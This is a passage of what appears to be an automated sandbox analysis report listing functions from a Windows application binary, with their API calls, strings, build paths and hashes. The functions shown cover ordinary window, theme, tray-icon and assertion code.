                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorInfoLastParametersSystem
                                                                                                • String ID: ::SystemParametersInfo( SPI_GETNONCLIENTMETRICS, metrics.cbSize, &metrics, 0 )$AWL::createDefaultMenuFont$d:\build\teamagent\_work\1\s\0\awl\src\menubarawl.cpp
                                                                                                • API String ID: 2777246624-3086755160
                                                                                                • Opcode ID: fe3950a6aa4dbef4850e8a8f6cd150306806dae23a6dc1e26b42a8bb8712c6af
                                                                                                • Instruction ID: 38cc2c6e32cf1b39b4f273771bfe43f1da98418044312f0a4da8b92f1ea6985e
                                                                                                • Opcode Fuzzy Hash: fe3950a6aa4dbef4850e8a8f6cd150306806dae23a6dc1e26b42a8bb8712c6af
                                                                                                • Instruction Fuzzy Hash: B12162B0D403499BDB10DF94CD4ABBE77B8FB04708F10456AE911A76C1E7B85E08CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,IsThemeBackgroundPartiallyTransparent), ref: 0044D42D
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\themeawl.cpp, xrefs: 0044D460
                                                                                                • IsThemeBackgroundPartiallyTransparent, xrefs: 0044D427
                                                                                                • @fO, xrefs: 0044D46A
                                                                                                • UxTheme.dll, xrefs: 0044D405
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AddressProc
                                                                                                • String ID: @fO$IsThemeBackgroundPartiallyTransparent$UxTheme.dll$d:\build\teamagent\_work\1\s\0\awl\src\themeawl.cpp
                                                                                                • API String ID: 190572456-1118442131
                                                                                                • Opcode ID: 70b5a7a5e01035b540ab8db5950c94f0e64963198876c2aaa2f60933df920c4b
                                                                                                • Instruction ID: 61bb80b71971838f76ed4a2f60792df1fa4f1174705d701fa51d99e94ff4efdb
                                                                                                • Opcode Fuzzy Hash: 70b5a7a5e01035b540ab8db5950c94f0e64963198876c2aaa2f60933df920c4b
                                                                                                • Instruction Fuzzy Hash: 2C21E170A44615AFDB50CF68DC81B6A3BE8B724725F10432AE416D77D0E3B8A900BB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • lstrcpynW.KERNEL32(?,?,?,?,?), ref: 0043A16A
                                                                                                • Shell_NotifyIconW.SHELL32(?,?), ref: 0043A176
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$EnterException@8IconLeaveNotifyShell_Throwlstrcpyn
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\trayiconawl.cpp
                                                                                                • API String ID: 2592958632-2478423819
                                                                                                • Opcode ID: 8ae1134641d7c3c212b9c087f6ec40b2c2dd0037f60a7e63ebd0e585fdb97f37
                                                                                                • Instruction ID: 48af49a5feb7afc8c0087e7405cb8f83032383f46d12bc3bdc540cc1d5e4ca3f
                                                                                                • Opcode Fuzzy Hash: 8ae1134641d7c3c212b9c087f6ec40b2c2dd0037f60a7e63ebd0e585fdb97f37
                                                                                                • Instruction Fuzzy Hash: 2C11A575A403146BD320DF19C846B6BB7E8AB54714F00C52BF9A8D7381E7B8E914CBCA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,DrawThemeParentBackground), ref: 0044D25F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AddressProc
                                                                                                • String ID: @fO$DrawThemeParentBackground$UxTheme.dll$d:\build\teamagent\_work\1\s\0\awl\src\themeawl.cpp
                                                                                                • API String ID: 190572456-1870250195
                                                                                                • Opcode ID: 1f61015747e0804541ceaf137bbcafe8af11ebac031a3d8a41322bf0301caa63
                                                                                                • Instruction ID: d7c333c1b882cf47c36f13f21fbd4fd00c5da987412bc164fbb4fde2f7ace5d1
                                                                                                • Opcode Fuzzy Hash: 1f61015747e0804541ceaf137bbcafe8af11ebac031a3d8a41322bf0301caa63
                                                                                                • Instruction Fuzzy Hash: 6E21AF70A00A40AFDB10DF6C9C81B6A7BE8F765B25F20436AE415D37D0E7B89900BB55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417172
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 004171A7
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004171C5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 3448037634-1285152028
                                                                                                • Opcode ID: e2775937ac0e473bababa8bc5f6c9536542efd6f516062831cf378fca41494ab
                                                                                                • Instruction ID: a35010dafd26b4aa82bc5dfa780f9db5c57ad3d9eebe56a83ba1b6051e0b8214
                                                                                                • Opcode Fuzzy Hash: e2775937ac0e473bababa8bc5f6c9536542efd6f516062831cf378fca41494ab
                                                                                                • Instruction Fuzzy Hash: 17118E36600A02ABD710CF59CC40BAEFBB9FF45721F18865EE81497381D7B9AD018B94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                • InterlockedDecrement.KERNEL32(0000000A), ref: 00472222
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00472245
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: ServerScan$xMS$xMS
                                                                                                • API String ID: 2574743344-3033536009
                                                                                                • Opcode ID: 151fc6a83e0ebfdcce20ab7eaff1af4237f0c34ab76a525d010d42ed9a7c008d
                                                                                                • Instruction ID: 38730767156e6be923b709c1e0cea1dedf77594167c80e419aa8b49ea0c2b097
                                                                                                • Opcode Fuzzy Hash: 151fc6a83e0ebfdcce20ab7eaff1af4237f0c34ab76a525d010d42ed9a7c008d
                                                                                                • Instruction Fuzzy Hash: 0E11D331901615ABCB11EF98CD01BEF7BB8FF05710F04865AF915A3281DB785A00C7A6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004A13F1
                                                                                                  • Part of subcall function 004B9C30: InterlockedIncrement.KERNEL32 ref: 004B9C69
                                                                                                  • Part of subcall function 004B9C30: InterlockedDecrement.KERNEL32(?), ref: 004B9CEB
                                                                                                  • Part of subcall function 004B9C30: RegCloseKey.ADVAPI32(00000000,?,?), ref: 004B9D2F
                                                                                                  • Part of subcall function 004B9C30: SetLastError.KERNEL32(00000000), ref: 004B9D36
                                                                                                  • Part of subcall function 004B9C30: InterlockedDecrement.KERNEL32(00530380), ref: 004B9D40
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004A141E
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004A1441
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$CloseErrorLast
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 3009240362-1285152028
                                                                                                • Opcode ID: 1c3564ca5441a28c81495bf81efc2e614b8669f30d3b1d26d1cb03e3a0c50c35
                                                                                                • Instruction ID: 51d0a84e514860297ed6d63f7babd82629762c4659c03ef63dc4d3047b2592f5
                                                                                                • Opcode Fuzzy Hash: 1c3564ca5441a28c81495bf81efc2e614b8669f30d3b1d26d1cb03e3a0c50c35
                                                                                                • Instruction Fuzzy Hash: F2119D31905654EFCB11DFA8C809BAEBFA8EF09721F00865DF851A3381C7785E00CBA6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 004503EC
                                                                                                • IsWindow.USER32(?), ref: 0045041D
                                                                                                • SendMessageW.USER32(?,00000114,00000006,00000000), ref: 00450453
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 0045042E
                                                                                                • @fO, xrefs: 00450438
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$MessageSend
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 1496643700-3471680474
                                                                                                • Opcode ID: d00ff1d4a689dd554f86557fe71864e76e6aeea6960895548b2a976bdf006b80
                                                                                                • Instruction ID: c01611466ff78696d8958b3632520e501015883f0bf946c599512880678d0d29
                                                                                                • Opcode Fuzzy Hash: d00ff1d4a689dd554f86557fe71864e76e6aeea6960895548b2a976bdf006b80
                                                                                                • Instruction Fuzzy Hash: 60014734700310ABE6300A655D06F7B734C9F42F16F00022BBF69FA2C2EBA8EC10859D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 00441221
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 00441208
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\inc\errors.h, xrefs: 004411FE
                                                                                                • @fO, xrefs: 0044123C
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\dockingawl.cpp, xrefs: 00441232
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$EnterException@8LeaveThrowWindow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\dockingawl.cpp$d:\build\teamagent\_work\1\s\0\fineobjects\inc\errors.h
                                                                                                • API String ID: 748300450-1615552242
                                                                                                • Opcode ID: 219aa72fb1fb796d467074e9f0405b2782d70e81ef40ecf7a2726bcc7ea66623
                                                                                                • Instruction ID: f68e756dfb4ac5d58c336779ebf7307a94d6c4a698be548912c967c7b4672f35
                                                                                                • Opcode Fuzzy Hash: 219aa72fb1fb796d467074e9f0405b2782d70e81ef40ecf7a2726bcc7ea66623
                                                                                                • Instruction Fuzzy Hash: B101D67538031066F63466256C03F7B6258FB80B11F10446FF606E66C1EBE8E811066D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0047A139
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0047A165
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\UnicodeString.h, xrefs: 0047A11F
                                                                                                • xMS, xrefs: 0047A172
                                                                                                • @fO, xrefs: 0047A129
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalInterlockedSectionValue$DecrementEnterException@8IncrementLeaveThrow
                                                                                                • String ID: @fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\UnicodeString.h$xMS
                                                                                                • API String ID: 3915468703-2004741952
                                                                                                • Opcode ID: 79ff8bc652307319a79ef82c1a85380dfff6d29d6dd751fb9cf0bf8d6a54b867
                                                                                                • Instruction ID: 913e9c423f700983b72719ace544171a85b1ecbf71c73b1c7be2a6392a124084
                                                                                                • Opcode Fuzzy Hash: 79ff8bc652307319a79ef82c1a85380dfff6d29d6dd751fb9cf0bf8d6a54b867
                                                                                                • Instruction Fuzzy Hash: 47012832641A14ABD721AF59CC02F6FBBACEF55B21F00862FF815A37D1D7B8581086D9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 00452376
                                                                                                • SendMessageW.USER32(?,00000198,?,?), ref: 004523CA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\winctrlawl.h
                                                                                                • API String ID: 701072176-3600689433
                                                                                                • Opcode ID: 527099348aaa0b5550d5e235396beea0eeba53aff9bcbe3a9a9d4cbfbec02aa2
                                                                                                • Instruction ID: 93daba2481ca94ec0b73775d964f6811658081e4e70261b80d5d3cd1bc1bc3ed
                                                                                                • Opcode Fuzzy Hash: 527099348aaa0b5550d5e235396beea0eeba53aff9bcbe3a9a9d4cbfbec02aa2
                                                                                                • Instruction Fuzzy Hash: CF01B17134070127E7201F299C0AB67B758AB41B21F10852BFE69DB2C1EBF9E4108B88
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EndDeferWindowPos.USER32(?,?,?,004DB100,000000FF), ref: 004450B1
                                                                                                • GetLastError.KERNEL32(?,?,004DB100,000000FF), ref: 004450BB
                                                                                                Strings
                                                                                                • AWL::CWindowGroupMover::~CWindowGroupMover, xrefs: 004450E4
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\windowgroupmoverawl.cpp, xrefs: 004450DA
                                                                                                • ::EndDeferWindowPos( dwp ) != 0, xrefs: 004450DF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DeferErrorLastWindow
                                                                                                • String ID: ::EndDeferWindowPos( dwp ) != 0$AWL::CWindowGroupMover::~CWindowGroupMover$d:\build\teamagent\_work\1\s\0\awl\src\windowgroupmoverawl.cpp
                                                                                                • API String ID: 189640761-3857403855
                                                                                                • Opcode ID: cbf1de9c04f676cd9227ef0271add344ade552965054482a16e7857645b8dba6
                                                                                                • Instruction ID: c76f7647a6c89ff85dc3a1dbfc3b5111accd4122121b222cce6dd7f856267cb2
                                                                                                • Opcode Fuzzy Hash: cbf1de9c04f676cd9227ef0271add344ade552965054482a16e7857645b8dba6
                                                                                                • Instruction Fuzzy Hash: 2801DF30E40A049BEF249B549C12B2B77A9E705B05F504AAEE909C3B83F73D88008A99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 0046C36C
                                                                                                • LeaveCriticalSection.KERNEL32(00534BE8,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 0046C3A5
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 0046C3B4
                                                                                                  • Part of subcall function 0046D000: InterlockedDecrement.KERNEL32(?), ref: 0046D05A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$DebuggerDecrementEnterInterlockedLeavePresent
                                                                                                • String ID: AssertStopMode$KS
                                                                                                • API String ID: 856910656-1260525766
                                                                                                • Opcode ID: 23b2b351087d79f1944885ca423635f14b5304434b96684c270e1e3e2757ec67
                                                                                                • Instruction ID: 4bdfa279544e94ec450afb384f18576edc30cf35b7f47cc3f900ff87f7d8e7db
                                                                                                • Opcode Fuzzy Hash: 23b2b351087d79f1944885ca423635f14b5304434b96684c270e1e3e2757ec67
                                                                                                • Instruction Fuzzy Hash: 8501D635D44654DBCB20DF58A9483BEFFA4F705B24F00465AEC68A7780D7B91910CBD6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000010B,00000000), ref: 0046C41C
                                                                                                • LeaveCriticalSection.KERNEL32(00534BE8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000010B), ref: 0046C455
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000010B,00000000), ref: 0046C464
                                                                                                  • Part of subcall function 0046D000: InterlockedDecrement.KERNEL32(?), ref: 0046D05A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$DebuggerDecrementEnterInterlockedLeavePresent
                                                                                                • String ID: ErrorStopMode$KS
                                                                                                • API String ID: 856910656-1937534107
                                                                                                • Opcode ID: 9edec1fe673435cd9a4b50ff1121a0634bcd080a37e7ad57e37e477b11026ee4
                                                                                                • Instruction ID: 5a027399bb2d044ea27f0660e86cd7a9c2ddbaab36f905b77dbf366dbf94a0e6
                                                                                                • Opcode Fuzzy Hash: 9edec1fe673435cd9a4b50ff1121a0634bcd080a37e7ad57e37e477b11026ee4
                                                                                                • Instruction Fuzzy Hash: 91010436D48655DBCB20CFA498683BEBFA4F701724F10425AD86863B80D7791800CBD2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • UnmapViewOfFile.KERNEL32(00000003,3iI,00000000,00000000,?,00000000,00496933,?,?), ref: 004971FA
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$EnterException@8FileLeaveThrowUnmapView
                                                                                                • String ID: 3iI$@fO$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\filemapping.cpp
                                                                                                • API String ID: 412391263-2572445355
                                                                                                • Opcode ID: 3c2f3a1d7a2bfd1052c7353bde6003e6bf7ca1ce822a277d7ae109a3844b368f
                                                                                                • Instruction ID: 40eb0239e7c4a16c08a52dfa2c4c91a7e13e4eb2b4acbe4b4567d08a0d3aae75
                                                                                                • Opcode Fuzzy Hash: 3c2f3a1d7a2bfd1052c7353bde6003e6bf7ca1ce822a277d7ae109a3844b368f
                                                                                                • Instruction Fuzzy Hash: B5019271740305AFE7249F24C882F27BBA4FB55714F11462BF501977D1DBB5A8108B94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 004632F6
                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000000), ref: 00463338
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 701072176-3237162522
                                                                                                • Opcode ID: a992c2abbbacec5748a853b6d2a4479366c85f2f957b6d105a0cc54f758d6f7f
                                                                                                • Instruction ID: e8171360ab00bd05ee51e0b58f29553c53be56688123b68ca7c7b450c05dba24
                                                                                                • Opcode Fuzzy Hash: a992c2abbbacec5748a853b6d2a4479366c85f2f957b6d105a0cc54f758d6f7f
                                                                                                • Instruction Fuzzy Hash: C3F04F7178072426F7242F294D17F7B3698DB14B12F10462FBD56EA2C1FAF8E960829D
                                                                                                Uniqueness

